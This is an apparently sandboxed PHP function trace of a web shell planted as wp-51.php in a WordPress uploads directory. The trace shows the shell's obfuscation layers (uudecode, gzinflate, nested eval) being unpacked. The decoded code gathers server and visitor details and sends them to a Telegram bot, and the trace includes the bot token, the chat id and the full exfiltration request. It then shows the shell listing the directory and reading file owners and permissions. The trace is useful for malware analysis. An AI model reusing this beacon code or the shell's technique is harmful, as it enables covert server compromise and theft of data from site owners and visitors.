5 61 0 0.004360 558952 convert_uudecode 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 1 'MG51M:]LP$/[>7W$S`=O0.0S*/K1D):1.&TCJS\'8V1EN$8RF)F"-YLMPNE/SW\nMG9Q7-RT)TP=+ENZ>>^Z1[O@$G$*K7!9.@W_AYV`%XTE9I(GF4D"NY#.GC,)X\nM`2/Q6\\@70=DS3]G7"_@,7<48!"+C@L\'P;@@;3ZDL%UHMF"19P5QXA1E+*%..\nMU9<KW$N8:9U?-ILE_7KAI7+>M-PKH)PY."TAS9*B@+\'4I!3)G)V]GIT!CDDI\nMTHI5)J>.6VVM3\\QH\\!Q:T""1\'_[PPP<[]`=![)/VS4UH/UWMS#`E+5.9U8SO\nMXG@8V4^&M"V%#==@&X:%#9>KE;V\'4*K*>0OD@86I6#C7`<E=$,4(ZM58?1_Y\nM44Q&8:_&:G5.>O?=`+&M?G`+EC=E>B8+/5X8%9QWP5W/@NA7%/L#J!-8`]ZW\nM!WY%P7H4U@?Q/`R(,D\',YPPP80-$$\\T<R]SC4=>(J6>FX#Z9;YS_F\\4:*I('
5 61 1 0.004389 559752
5 61 R '�Tmk�0\020��_q3\001��9\f�>�d%�N\033H��v6F[�c)��#y��.�����W7-\t�\aK��{��\004�B�\\\026N���`\005�IY���R@��3���x\001#�[�\027A�3O��\v�\f]�\030\004"��n\b\033O�,\027Z-�$Y�\\x�\031K(S�+�K�i�_6�%�z�r�+��98-!͒���Ԥ\024ɜ����\001�I)ҊU&��[m�O�h�\034Z� �\037���\a;�\aA��Mh?]��0%-S�Ռ��x\030�O��-�\r�`\033��\r�����P��y\v䁅�X8�\001�]\020�\b��X}\037�QLFa��juNz��\000��~p\v�7ez&\v=^\030\025�w�]ς�W\024�\003�\023X\003\a~E�z\024�\a�<\f�2A��\f0a\003D\023�\034���Q�g��>�o����\032*�\023�\021T\024t���$� �h�a�����'
5 62 0 0.004448 558184 gzinflate 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 1 '�Tmk�0\020��_q3\001��9\f�>�d%�N\033H��v6F[�c)��#y��.�����W7-\t�\aK��{��\004�B�\\\026N���`\005�IY���R@��3���x\001#�[�\027A�3O��\v�\f]�\030\004"��n\b\033O�,\027Z-�$Y�\\x�\031K(S�+�K�i�_6�%�z�r�+��98-!͒���Ԥ\024ɜ����\001�I)ҊU&��[m�O�h�\034Z� �\037���\a;�\aA��Mh?]��0%-S�Ռ��x\030�O��-�\r�`\033��\r�����P��y\v䁅�X8�\001�]\020�\b��X}\037�QLFa��juNz��\000��~p\v�7ez&\v=^\030\025�w�]ς�W\024�\003�\023X\003\a~E�z\024�\a�<\f�2A��\f0a\003D\023�\034���Q�g��>�o����\032*�\023�\021T\024t���$� �h�a�����'
5 62 1 0.004515 560008
5 62 R 'if (strpos($i1i, "Obfuscation provided by Unknowndevice64 - Free Online PHP Obfuscator") == false) { header("Location: http://ud64.com/"); die(); } class bot_uname\n{\n\n function log()\n {\n\n $ip = $_SERVER[\'REMOTE_ADDR\'];\n $protocol = $_SERVER[\'HTTPS\'] == \'on\' ? \'https\' : \'http\';\n $url = $protocol . "://" . $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'REQUEST_URI\'];\n $SERVER_INFO = "LOG ".gethostbyname($_SERVER[\'HTTP_HOST\'])." SYSTEM " . $_SERVER[\'SERVER_NAME\']'
4 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 $x0RzV = 'if (strpos($i1i, "Obfuscation provided by Unknowndevice64 - Free Online PHP Obfuscator") == false) { header("Location: http://ud64.com/"); die(); } class bot_uname\n{\n\n function log()\n {\n\n $ip = $_SERVER[\'REMOTE_ADDR\'];\n $protocol = $_SERVER[\'HTTPS\'] == \'on\' ? \'https\' : \'http\';\n $url = $protocol . "://" . $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'REQUEST_URI\'];\n $SERVER_INFO = "LOG ".gethostbyname($_SERVER[\'HTTP_HOST\'])." SYSTEM " . $_SERVER[\'SERVER_NAME\']'
5 63 0 0.004649 571640 eval 1 'if (strpos($i1i, "Obfuscation provided by Unknowndevice64 - Free Online PHP Obfuscator") == false) { header("Location: http://ud64.com/"); die(); } class bot_uname\n{\n\n function log()\n {\n\n $ip = $_SERVER[\'REMOTE_ADDR\'];\n $protocol = $_SERVER[\'HTTPS\'] == \'on\' ? \'https\' : \'http\';\n $url = $protocol . "://" . $_SERVER[\'HTTP_HOST\'] . $_SERVER[\'REQUEST_URI\'];\n $SERVER_INFO = "LOG ".gethostbyname($_SERVER[\'HTTP_HOST\'])." SYSTEM " . $_SERVER[\'SERVER_NAME\'] . "\\n";\n $SERVER_INFO .= "ADD Time : " . date("r") . "\\n";\n $SERVER_INFO .= "Server Nam : " . $_SERVER[\'SERVER_NAME\'] . "\\n";\n $SERVER_INFO .= "Server Soft : " . $_SERVER[\'SERVER_SOFTWARE\'] . "\\n";\n $SERVER_INFO .= "OS SYSTEM : " . PHP_OS . "\\n";\n $SERVER_INFO .= "Uname : " . php_uname() . "\\n";\n $SERVER_INFO .= "ROOT Server : " . $_SERVER[\'DOCUMENT_ROOT\'] . "\\n";\n $SERVER_INFO .= "Script pwd : " . $_SERVER[\'SCRIPT_FILENAME\'] . "\\n";\n $SERVER_INFO .= "URL LOG : " . $url . "\\n";\n $SERVER_INFO .= "IP Address : " . $ip . "\\n";\n $SERVER_INFO .= "User Agent : " . $_SERVER[\'HTTP_USER_AGENT\'] . "\\n";\n\n if (!empty(file_get_contents(\'php://input\'))) {\n\n $SERVER_INFO .= "Client Content : \\n\\n" . file_get_contents(\'php://input\') . "\\n";\n\n }\n\n return $SERVER_INFO;\n\n }\n\n function bot_uname_log($add_time, $dgrp_time, $dgrp_get)\n {\n \n\n foreach ($dgrp_time as $dgrp_id)\n {\n\n $data = [\n\n \'text\' => $dgrp_get,\n \'chat_id\' => $dgrp_id\n\n ];\n\n file_get_contents("https://api.telegram.org/bot$add_time/sendMessage?" . http_build_query($data));\n\n }\n\n }\n\n}' /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code 2 0
6 64 0 0.004710 571640 strpos 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 1 2 '========================================================================\n\tObfuscation provided by Unknowndevice64 - Free Online PHP Obfuscator\n\t\t\t\thttp://www.ud64.com/\n==============================================================================' 'Obfuscation provided by Unknowndevice64 - Free Online PHP Obfuscator'
6 64 1 0.004733 571712
6 64 R 74
5 63 1 0.004747 571640
4 51 1 0.004755 570416
3 48 1 0.004762 566440
2 45 1 0.004771 563536
2 65 0 0.004779 560688 scandir 0 /var/www/html/uploads/wp-51.php 506 1 '/var/www/html/uploads'
2 65 1 0.004813 561312
2 65 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'wp-51.php']
1 A /var/www/html/uploads/wp-51.php 506 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'wp-51.php']
2 66 0 0.004851 561280 getcwd 0 /var/www/html/uploads/wp-51.php 507 0
2 66 1 0.004865 561328
2 66 R '/var/www/html/uploads'
1 A /var/www/html/uploads/wp-51.php 507 $pa = '/var/www/html/uploads'
2 67 0 0.004890 561328 dirname 0 /var/www/html/uploads/wp-51.php 523 1 '/var/www/html/uploads'
2 67 1 0.004904 561408
2 67 R '/var/www/html'
1 A /var/www/html/uploads/wp-51.php 530 $add_time = '5662267750:AAEKaSIU7LcFg9GLqusSRcM1y6W90cb2YWA'
1 A /var/www/html/uploads/wp-51.php 534 $dgrp_time = [0 => '2001210814']
1 A /var/www/html/uploads/wp-51.php 538 $func = class bot_uname { }
2 69 0 0.004966 561536 bot_uname->log 1 /var/www/html/uploads/wp-51.php 539 0
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 7 $ip = '127.0.0.1'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 8 $protocol = 'http'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 9 $url = 'http://localhost/uploads/wp-51.php'
3 70 0 0.005019 561600 gethostbyname 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 10 1 'localhost'
3 70 1 0.005055 561680
3 70 R '127.0.0.1'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 10 $SERVER_INFO = 'LOG 127.0.0.1 SYSTEM localhost\n'
3 71 0 0.005086 561656 date 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 11 1 'r'
3 71 1 0.005147 564008
3 71 R 'Sun, 12 Feb 2023 18:01:24 -0500'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 11 $SERVER_INFO .= 'ADD Time : Sun, 12 Feb 2023 18:01:24 -0500\n'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 12 $SERVER_INFO .= 'Server Nam : localhost\n'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 13 $SERVER_INFO .= 'Server Soft : Apache/2.4.52 (Ubuntu)\n'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 14 $SERVER_INFO .= 'OS SYSTEM : Linux\n'
3 72 0 0.005225 563856 php_uname 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 15 0
3 72 1 0.005241 563968
3 72 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 15 $SERVER_INFO .= 'Uname : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64\n'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 16 $SERVER_INFO .= 'ROOT Server : /var/www/html\n'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 17 $SERVER_INFO .= 'Script pwd : /var/www/html/uploads/wp-51.php\n'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 18 $SERVER_INFO .= 'URL LOG : http://localhost/uploads/wp-51.php\n'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 19 $SERVER_INFO .= 'IP Address : 127.0.0.1\n'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 20 $SERVER_INFO .= 'User Agent : python-requests/2.25.1\n'
3 73 0 0.005356 564176 file_get_contents 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 22 1 'php://input'
3 73 1 0.005379 564912
3 73 R ''
2 69 1 0.005401 564808
2 69 R 'LOG 127.0.0.1 SYSTEM localhost\nADD Time : Sun, 12 Feb 2023 18:01:24 -0500\nServer Nam : localhost\nServer Soft : Apache/2.4.52 (Ubuntu)\nOS SYSTEM : Linux\nUname : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64\nROOT Server : /var/www/html\nScript pwd : /var/www/html/uploads/wp-51.php\nURL LOG : http://localhost/uploads/wp-51.php\nIP Address : 127.0.0.1\nUser Agent : python-requests/2.25.1\n'
1 A /var/www/html/uploads/wp-51.php 539 $dgrp_get = 'LOG 127.0.0.1 SYSTEM localhost\nADD Time : Sun, 12 Feb 2023 18:01:24 -0500\nServer Nam : localhost\nServer Soft : Apache/2.4.52 (Ubuntu)\nOS SYSTEM : Linux\nUname : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64\nROOT Server : /var/www/html\nScript pwd : /var/www/html/uploads/wp-51.php\nURL LOG : http://localhost/uploads/wp-51.php\nIP Address : 127.0.0.1\nUser Agent : python-requests/2.25.1\n'
2 74 0 0.005460 564808 bot_uname->bot_uname_log 1 /var/www/html/uploads/wp-51.php 540 3 '5662267750:AAEKaSIU7LcFg9GLqusSRcM1y6W90cb2YWA' [0 => '2001210814'] 'LOG 127.0.0.1 SYSTEM localhost\nADD Time : Sun, 12 Feb 2023 18:01:24 -0500\nServer Nam : localhost\nServer Soft : Apache/2.4.52 (Ubuntu)\nOS SYSTEM : Linux\nUname : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64\nROOT Server : /var/www/html\nScript pwd : /var/www/html/uploads/wp-51.php\nURL LOG : http://localhost/uploads/wp-51.php\nIP Address : 127.0.0.1\nUser Agent : python-requests/2.25.1\n'
2 A /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 42 $data = ['text' => 'LOG 127.0.0.1 SYSTEM localhost\nADD Time : Sun, 12 Feb 2023 18:01:24 -0500\nServer Nam : localhost\nServer Soft : Apache/2.4.52 (Ubuntu)\nOS SYSTEM : Linux\nUname : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64\nROOT Server : /var/www/html\nScript pwd : /var/www/html/uploads/wp-51.php\nURL LOG : http://localhost/uploads/wp-51.php\nIP Address : 127.0.0.1\nUser Agent : python-requests/2.25.1\n', 'chat_id' => '2001210814']
3 75 0 0.005518 565296 http_build_query 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 46 1 ['text' => 'LOG 127.0.0.1 SYSTEM localhost\nADD Time : Sun, 12 Feb 2023 18:01:24 -0500\nServer Nam : localhost\nServer Soft : Apache/2.4.52 (Ubuntu)\nOS SYSTEM : Linux\nUname : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64\nROOT Server : /var/www/html\nScript pwd : /var/www/html/uploads/wp-51.php\nURL LOG : http://localhost/uploads/wp-51.php\nIP Address : 127.0.0.1\nUser Agent : python-requests/2.25.1\n', 'chat_id' => '2001210814']
3 75 1 0.005552 569432
3 75 R 'text=LOG+127.0.0.1+SYSTEM+localhost%0AADD+Time++%3A+Sun%2C+12+Feb+2023+18%3A01%3A24+-0500%0AServer+Nam++%3A+localhost%0AServer+Soft+%3A+Apache%2F2.4.52+%28Ubuntu%29%0AOS+SYSTEM+++%3A+Linux%0AUname+++++++%3A+Linux+osboxes+5.15.0-60-generic+%2366-Ubuntu+SMP+Fri+Jan+20+14%3A29%3A49+UTC+2023+x86_64%0AROOT+Server+%3A+%2Fvar%2Fwww%2Fhtml%0AScript+pwd++%3A+%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fwp-51.php%0AURL+LOG+++++%3A+http%3A%2F%2Flocalhost%2Fuploads%2Fwp-51.php%0AIP+Address++%3A+127.0.0.1%0AUser+Agent++%3A+python-re'
3 76 0 0.005612 565952 file_get_contents 0 /var/www/html/uploads/wp-51.php(436) : eval()'d code(1) : eval()'d code(1) : eval()'d code(2) : eval()'d code 46 1 'https://api.telegram.org/bot5662267750:AAEKaSIU7LcFg9GLqusSRcM1y6W90cb2YWA/sendMessage?text=LOG+127.0.0.1+SYSTEM+localhost%0AADD+Time++%3A+Sun%2C+12+Feb+2023+18%3A01%3A24+-0500%0AServer+Nam++%3A+localhost%0AServer+Soft+%3A+Apache%2F2.4.52+%28Ubuntu%29%0AOS+SYSTEM+++%3A+Linux%0AUname+++++++%3A+Linux+osboxes+5.15.0-60-generic+%2366-Ubuntu+SMP+Fri+Jan+20+14%3A29%3A49+UTC+2023+x86_64%0AROOT+Server+%3A+%2Fvar%2Fwww%2Fhtml%0AScript+pwd++%3A+%2Fvar%2Fwww%2Fhtml%2Fuploads%2Fwp-51.php%0AURL+LOG+++++%3A+http%3A%2F%2F'
3 76 1 0.150376 568656
3 76 R '{"ok":true,"result":{"message_id":8304,"from":{"id":5662267750,"is_bot":true,"first_name":"zenzen","username":"zenshellbot"},"chat":{"id":2001210814,"first_name":"Trade","last_name":"Bulls","username":"TradeBullsViP","type":"private"},"date":1676242884,"text":"LOG 127.0.0.1 SYSTEM localhost\\nADD Time : Sun, 12 Feb 2023 18:01:24 -0500\\nServer Nam : localhost\\nServer Soft : Apache/2.4.52 (Ubuntu)\\nOS SYSTEM : Linux\\nUname : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC '
2 74 1 0.150441 565184
2 74 R NULL
1 A /var/www/html/uploads/wp-51.php 540 $result = NULL
2 77 0 0.150501 565184 filemtime 0 /var/www/html/uploads/wp-51.php 542 1 '/var/www/html/uploads/.'
2 77 1 0.150536 565224
2 77 R 1676242884
2 78 0 0.150550 565136 date 0 /var/www/html/uploads/wp-51.php 542 2 'Y-m-d H:i:s' 1676242884
2 78 1 0.150584 565464
2 78 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 542 $dt = '2023-02-12 18:01:24'
2 79 0 0.150609 565392 function_exists 0 /var/www/html/uploads/wp-51.php 543 1 'posix_getpwuid'
2 79 1 0.150623 565432
2 79 R TRUE
2 80 0 0.150637 565440 fileowner 0 /var/www/html/uploads/wp-51.php 544 1 '/var/www/html/uploads/.'
2 80 1 0.150649 565480
2 80 R 0
2 81 0 0.150661 565392 posix_getpwuid 0 /var/www/html/uploads/wp-51.php 544 1 0
2 81 1 0.150708 566192
2 81 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 544 $downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 545 $downer = 'root'
2 82 0 0.150761 565424 function_exists 0 /var/www/html/uploads/wp-51.php 549 1 'posix_getgrgid'
2 82 1 0.150774 565464
2 82 R TRUE
2 83 0 0.150786 565472 filegroup 0 /var/www/html/uploads/wp-51.php 550 1 '/var/www/html/uploads/.'
2 83 1 0.150799 565512
2 83 R 0
2 84 0 0.150811 565424 posix_getgrgid 0 /var/www/html/uploads/wp-51.php 550 1 0
2 84 1 0.150834 566080
2 84 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 550 $dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 551 $dgrp = 'root'
2 85 0 0.150877 565504 is_dir 0 /var/www/html/uploads/wp-51.php 555 1 '/var/www/html/uploads/.'
2 85 1 0.150890 565544
2 85 R TRUE
2 86 0 0.150904 565512 filemtime 0 /var/www/html/uploads/wp-51.php 542 1 '/var/www/html/uploads/..'
2 86 1 0.150918 565560
2 86 R 1676242884
2 87 0 0.150931 565464 date 0 /var/www/html/uploads/wp-51.php 542 2 'Y-m-d H:i:s' 1676242884
2 87 1 0.150961 565792
2 87 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 542 $dt = '2023-02-12 18:01:24'
2 88 0 0.150985 565464 function_exists 0 /var/www/html/uploads/wp-51.php 543 1 'posix_getpwuid'
2 88 1 0.150998 565504
2 88 R TRUE
2 89 0 0.151010 565520 fileowner 0 /var/www/html/uploads/wp-51.php 544 1 '/var/www/html/uploads/..'
2 89 1 0.151022 565560
2 89 R 0
2 90 0 0.151034 565464 posix_getpwuid 0 /var/www/html/uploads/wp-51.php 544 1 0
2 90 1 0.151055 566264
2 90 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 544 $downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 545 $downer = 'root'
2 91 0 0.151104 565464 function_exists 0 /var/www/html/uploads/wp-51.php 549 1 'posix_getgrgid'
2 91 1 0.151117 565504
2 91 R TRUE
2 92 0 0.151129 565520 filegroup 0 /var/www/html/uploads/wp-51.php 550 1 '/var/www/html/uploads/..'
2 92 1 0.151141 565560
2 92 R 0
2 93 0 0.151153 565464 posix_getgrgid 0 /var/www/html/uploads/wp-51.php 550 1 0
2 93 1 0.151174 566120
2 93 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 550 $dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 551 $dgrp = 'root'
2 94 0 0.151216 565520 is_dir 0 /var/www/html/uploads/wp-51.php 555 1 '/var/www/html/uploads/..'
2 94 1 0.151228 565560
2 94 R TRUE
2 95 0 0.151241 565520 filemtime 0 /var/www/html/uploads/wp-51.php 542 1 '/var/www/html/uploads/.htaccess'
2 95 1 0.151256 565560
2 95 R 1676242884
2 96 0 0.151269 565464 date 0 /var/www/html/uploads/wp-51.php 542 2 'Y-m-d H:i:s' 1676242884
2 96 1 0.151298 565792
2 96 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 542 $dt = '2023-02-12 18:01:24'
2 97 0 0.151322 565464 function_exists 0 /var/www/html/uploads/wp-51.php 543 1 'posix_getpwuid'
2 97 1 0.151335 565504
2 97 R TRUE
2 98 0 0.151347 565520 fileowner 0 /var/www/html/uploads/wp-51.php 544 1 '/var/www/html/uploads/.htaccess'
2 98 1 0.151360 565560
2 98 R 0
2 99 0 0.151372 565464 posix_getpwuid 0 /var/www/html/uploads/wp-51.php 544 1 0
2 99 1 0.151393 566264
2 99 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 544 $downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 545 $downer = 'root'
2 100 0 0.151442 565464 function_exists 0 /var/www/html/uploads/wp-51.php 549 1 'posix_getgrgid'
2 100 1 0.151455 565504
2 100 R TRUE
2 101 0 0.151467 565520 filegroup 0 /var/www/html/uploads/wp-51.php 550 1 '/var/www/html/uploads/.htaccess'
2 101 1 0.151483 565560
2 101 R 0
2 102 0 0.151495 565464 posix_getgrgid 0 /var/www/html/uploads/wp-51.php 550 1 0
2 102 1 0.151516 566120
2 102 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 550 $dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 551 $dgrp = 'root'
2 103 0 0.151558 565520 is_dir 0 /var/www/html/uploads/wp-51.php 555 1 '/var/www/html/uploads/.htaccess'
2 103 1 0.151571 565560
2 103 R FALSE
2 104 0 0.151584 565520 filemtime 0 /var/www/html/uploads/wp-51.php 542 1 '/var/www/html/uploads/data'
2 104 1 0.151599 565560
2 104 R 1676242884
2 105 0 0.151611 565464 date 0 /var/www/html/uploads/wp-51.php 542 2 'Y-m-d H:i:s' 1676242884
2 105 1 0.151641 565792
2 105 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 542 $dt = '2023-02-12 18:01:24'
2 106 0 0.151665 565464 function_exists 0 /var/www/html/uploads/wp-51.php 543 1 'posix_getpwuid'
2 106 1 0.151678 565504
2 106 R TRUE
2 107 0 0.151690 565520 fileowner 0 /var/www/html/uploads/wp-51.php 544 1 '/var/www/html/uploads/data'
2 107 1 0.151703 565560
2 107 R 0
2 108 0 0.151714 565464 posix_getpwuid 0 /var/www/html/uploads/wp-51.php 544 1 0
2 108 1 0.151735 566264
2 108 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 544 $downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 545 $downer = 'root'
2 109 0 0.151784 565464 function_exists 0 /var/www/html/uploads/wp-51.php 549 1 'posix_getgrgid'
2 109 1 0.151797 565504
2 109 R TRUE
2 110 0 0.151810 565520 filegroup 0 /var/www/html/uploads/wp-51.php 550 1 '/var/www/html/uploads/data'
2 110 1 0.151822 565560
2 110 R 0
2 111 0 0.151834 565464 posix_getgrgid 0 /var/www/html/uploads/wp-51.php 550 1 0
2 111 1 0.151854 566120
2 111 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 550 $dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 551 $dgrp = 'root'
2 112 0 0.151896 565520 is_dir 0 /var/www/html/uploads/wp-51.php 555 1 '/var/www/html/uploads/data'
2 112 1 0.151908 565560
2 112 R TRUE
2 113 0 0.151923 565520 is_writable 0 /var/www/html/uploads/wp-51.php 563 1 '/var/www/html/uploads/data'
2 113 1 0.151941 565560
2 113 R TRUE
2 114 0 0.151955 565520 p 1 /var/www/html/uploads/wp-51.php 565 1 '/var/www/html/uploads/data'
3 115 0 0.151967 565520 fileperms 0 /var/www/html/uploads/wp-51.php 63 1 '/var/www/html/uploads/data'
3 115 1 0.151979 565560
3 115 R 16895
2 A /var/www/html/uploads/wp-51.php 63 $p = 16895
2 A /var/www/html/uploads/wp-51.php 64 $i = 'u'
2 A /var/www/html/uploads/wp-51.php 69 $i = 'd'
2 A /var/www/html/uploads/wp-51.php 72 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 73 $i .= 'w'
2 A /var/www/html/uploads/wp-51.php 74 $i .= 'x'
2 A /var/www/html/uploads/wp-51.php 75 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 76 $i .= 'w'
2 A /var/www/html/uploads/wp-51.php 77 $i .= 'x'
2 A /var/www/html/uploads/wp-51.php 78 $i .= 'r'
2 A /var/www/html/uploads/wp-51.php 79 $i .= 'w'
2 A /var/www/html/uploads/wp-51.php 80 $i .= 'x'
2 114 1 0.152103 565560
2 114 R 'drwxrwxrwx'
2 116 0 0.152117 565520 is_writable 0 /var/www/html/uploads/wp-51.php 566 1 '/var/www/html/uploads/data'
2 116 1 0.152132 565560
2 116 R TRUE
2 117 0 0.152146 565528 filemtime 0 /var/www/html/uploads/wp-51.php 542 1 '/var/www/html/uploads/prepend.php'
2 117 1 0.152161 565576
2 117 R 1676242884
2 118 0 0.152174 565472 date 0 /var/www/html/uploads/wp-51.php 542 2 'Y-m-d H:i:s' 1676242884
2 118 1 0.152204 565800
2 118 R '2023-02-12 18:01:24'
1 A /var/www/html/uploads/wp-51.php 542 $dt = '2023-02-12 18:01:24'
2 119 0 0.152227 565472 function_exists 0 /var/www/html/uploads/wp-51.php 543 1 'posix_getpwuid'
2 119 1 0.152244 565512
2 119 R TRUE
2 120 0 0.152257 565536 fileowner 0 /var/www/html/uploads/wp-51.php 544 1 '/var/www/html/uploads/prepend.php'
2 120 1 0.152270 565576
2 120 R 0
2 121 0 0.152282 565472 posix_getpwuid 0 /var/www/html/uploads/wp-51.php 544 1 0
2 121 1 0.152303 566272
2 121 R ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 544 $downer = ['name' => 'root', 'passwd' => 'x', 'uid' => 0, 'gid' => 0, 'gecos' => 'root', 'dir' => '/root', 'shell' => '/bin/bash']
1 A /var/www/html/uploads/wp-51.php 545 $downer = 'root'
2 122 0 0.152352 565472 function_exists 0 /var/www/html/uploads/wp-51.php 549 1 'posix_getgrgid'
2 122 1 0.152365 565512
2 122 R TRUE
2 123 0 0.152378 565536 filegroup 0 /var/www/html/uploads/wp-51.php 550 1 '/var/www/html/uploads/prepend.php'
2 123 1 0.152391 565576
2 123 R 0
2 124 0 0.152402 565472 posix_getgrgid 0 /var/www/html/uploads/wp-51.php 550 1 0
2 124 1 0.152423 566128
2 124 R ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 550 $dgrp = ['name' => 'root', 'passwd' => 'x', 'members' => [], 'gid' => 0]
1 A /var/www/html/uploads/wp-51.php 551 $dgrp = 'root'
